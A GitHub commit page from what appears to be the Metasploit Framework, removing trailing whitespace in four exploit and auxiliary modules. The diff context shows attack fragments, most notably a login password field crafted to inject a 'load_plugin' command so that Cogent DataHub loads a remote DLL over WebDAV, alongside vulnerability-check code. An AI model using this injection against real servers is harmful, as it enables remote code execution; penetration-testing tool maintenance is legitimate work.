Skip to content

Commit b6ded98

Browse files
committed
Remove EOL whitespace
1 parent 4904426 commit b6ded98

File tree

4 files changed

+7
-7
lines changed

4 files changed

+7
-7
lines changed

modules/auxiliary/admin/oracle/sid_brute.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -70,7 +70,7 @@ def run
7070
)
7171
print_good("#{rhost}:#{rport} Found SID '#{sid.strip}'")
7272
end
73-
73+
7474
end
7575

7676
print_status("Done with brute force...")

modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -88,7 +88,7 @@ def check
8888
validate = "\x32\x32\x30\x20\xbb\xb6\xd3\xad\xb9"
8989
validate << "\xe2\xc1\xd9\x46\x54\x50\xb7\xfe\xce"
9090
validate << "\xf1\xc6\xf7\x21\x0d\x0a"
91-
91+
9292
if banner.to_s == validate
9393
return Exploit::CheckCode::Vulnerable
9494
end

modules/exploits/windows/http/cogent_datahub_command.rb

Lines changed: 4 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -50,7 +50,7 @@ module has been tested successfully with Cogent DataHub 7.3.4 on
5050
register_options(
5151
[
5252
OptString.new('URIPATH', [ true, 'The URI to use (do not change)', '/']),
53-
OptPort.new('SRVPORT', [ true, 'The daemon port to listen on ' +
53+
OptPort.new('SRVPORT', [ true, 'The daemon port to listen on ' +
5454
'(do not change)', 80 ]),
5555
OptInt.new('WEBDAV_DELAY', [ true, 'Time that the HTTP Server will ' +
5656
'wait for the payload request', 20]),
@@ -374,7 +374,7 @@ def send_injection(dll)
374374
'vars_post' =>
375375
{
376376
'username' => rand_text_alpha(3 + rand(3)),
377-
'password' => "#{rand_text_alpha(3 + rand(3))}\")" +
377+
'password' => "#{rand_text_alpha(3 + rand(3))}\")" +
378378
"(load_plugin \"#{dll}\" 1)(\""
379379
}
380380
}, 1)
@@ -414,7 +414,7 @@ def exploit
414414
@exploit_unc = "\\\\#{@myhost}\\"
415415

416416
if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
417-
fail_with(Failure::BadConfig, 'Using WebDAV requires SRVPORT=80 and ' +
417+
fail_with(Failure::BadConfig, 'Using WebDAV requires SRVPORT=80 and ' +
418418
'URIPATH=/')
419419
end
420420

@@ -439,7 +439,7 @@ def exploit
439439
print_error("#{peer} - Unexpected answer")
440440
end
441441
else
442-
fail_with(Failure::BadConfig, 'Bad UNCPATH format, should be ' +
442+
fail_with(Failure::BadConfig, 'Bad UNCPATH format, should be ' +
443443
'\\\\host\\shared_folder\\base_name.dll')
444444
end
445445
end

modules/exploits/windows/lotus/domino_sametime_stmux.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -66,7 +66,7 @@ def check
6666
req = "HEAD / HTTP/1.1\r\n"
6767
req << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
6868
req << "User-Agent: Sametime Community Agent\r\n\r\n"
69-
69+
7070
sock.put(req)
7171
res = sock.get_once || ''
7272

0 commit comments

Comments
 (0)